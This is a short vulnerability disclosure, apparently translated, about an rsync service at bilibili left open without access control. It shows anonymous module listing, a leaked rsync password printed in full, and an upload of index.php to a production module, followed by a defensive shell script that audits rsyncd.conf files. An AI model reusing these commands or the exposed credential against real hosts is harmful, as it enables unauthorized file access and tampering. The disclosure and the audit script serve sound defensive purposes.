
bilibili rsync access-control error leads to data leak

2015-01-15 04:35

An rsync service has no proper access control, so its files can be read by anyone:

rsync 121.52.243.4::websync

drwxr-xr-x 4096 2014/03/14 09:53:57 .
-rw-r--r-- 317 2012/11/29 11:54:39 createKey
-rwxr-xr-x 86 2012/06/14 20:18:07 dropCache
-rwxr-xr-x 417 2013/01/18 20:12:50 nfssync.sh
-rw-r--r-- 3 2014/03/14 09:53:57 pass
-rwx------ 527 2012/01/15 00:56:27 syncApache
-rwx------ 680 2012/01/15 00:51:10 syncConfig
-rwxr-xr-x 266 2012/09/10 15:03:36 syncLVS
-rwxr-xr-x 558 2012/09/03 18:11:26 syncNodeServer
-rwx------ 1366 2012/09/21 22:27:09 syncSLB

The files in turn contain passwords for other rsync services, so those services can be accessed as well:

cat websync.pas
cyMm6HzcPjxJ5BJj


telnet 121.52.243.12 80
Trying 121.52.243.12...
Connected to 121.52.243.12.
Escape character is '^]'.
GET /root.txt HTTP/1.1
HOST: www.bilibili.com

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 04 Dec 2014 03:31:47 GMT
Content-Type: text/plain
Content-Length: 32
Last-Modified: Thu, 03 Jul 2014 02:50:09 GMT
Connection: keep-alive
X-SLB-Server: hd-slb-2
Accept-Ranges: bytes

9e9fe27b3cef4368e9aa2d33d9d0fbbe


The module's permissions also allow arbitrary files to be uploaded:



rsync -avz index.php websync@121.52.243.12::bilibili
sending incremental file list

sent 52 bytes received 11 bytes 42.00 bytes/sec
total size is 2633 speedup is 41.79


Solution:

Add proper access control to rsync.
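As an added example (not part of the original report or of bilibili's configuration), a small POSIX shell audit that reads an rsyncd.conf and flags modules with the failure described above: no "auth users"/"secrets file", no "hosts allow", or "read only = no". The sample configs are constructed; the module name follows the report, while the paths and the 10.0.0.0/8 allow-list are assumptions.

```shell
#!/bin/sh
# Added example (not from the original report): audit an rsyncd.conf for the
# weakness described above: a module anyone can list, read and write. Flags modules
# lacking "auth users", "secrets file", "hosts allow", or set "read only = no".
audit_rsyncd_conf() {
  awk '
    function has(k) { return (k in mod) || (k in glob) }
    function report(  miss, ro) {
      if (name == "") return
      miss = ""
      if (!has("auth users"))   miss = miss " auth-users"
      if (!has("secrets file")) miss = miss " secrets-file"
      if (!has("hosts allow"))  miss = miss " hosts-allow"
      # rsync defaults to "read only = yes"; a global value is inherited by modules
      ro = tolower(("read only" in mod) ? mod["read only"] : (("read only" in glob) ? glob["read only"] : "yes"))
      if (ro == "no" || ro == "false" || ro == "0") miss = miss " read-only=no"
      if (miss != "") { print name ":" miss; found = 1 }
    }
    /^[[:space:]]*[#;]/ || /^[[:space:]]*$/ { next }   # comments and blank lines
    /^[[:space:]]*\[/ {                                # start of a [module] section
      report()
      name = $0; sub(/^[[:space:]]*\[/, "", name); sub(/\].*$/, "", name)
      split("", mod)
      next
    }
    /[=]/ {                                            # key = value line
      key = $0; sub(/=.*/, "", key); gsub(/^[[:space:]]+|[[:space:]]+$/, "", key)
      val = $0; sub(/^[^=]*=[[:space:]]*/, "", val); sub(/[[:space:]]+$/, "", val)
      if (name == "") glob[key] = val; else mod[key] = val
    }
    END { report(); exit (found ? 1 : 0) }
  ' "$1"
}
# Constructed samples: an open module like the one in the report, and a hardened one.
weak=$(mktemp); fixed=$(mktemp); trap 'rm -f "$weak" "$fixed"' EXIT
cat >"$weak" <<'EOF'
[websync]
    path = /data/websync
    read only = no
EOF
cat >"$fixed" <<'EOF'
[websync]
    path = /data/websync
    read only = yes
    list = no
    auth users = websync
    secrets file = /etc/rsyncd.secrets
    hosts allow = 10.0.0.0/8
EOF
audit_rsyncd_conf "$weak"; audit_rsyncd_conf "$fixed"  # first prints a finding, second is silent
```

The function exits 1 when any module is flagged, so it can gate a config deployment; the hardened module additionally sets "list = no" so the module name is not enumerable with a bare "rsync host::".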


Source: www.2cto.com/Article/201501/369225.html
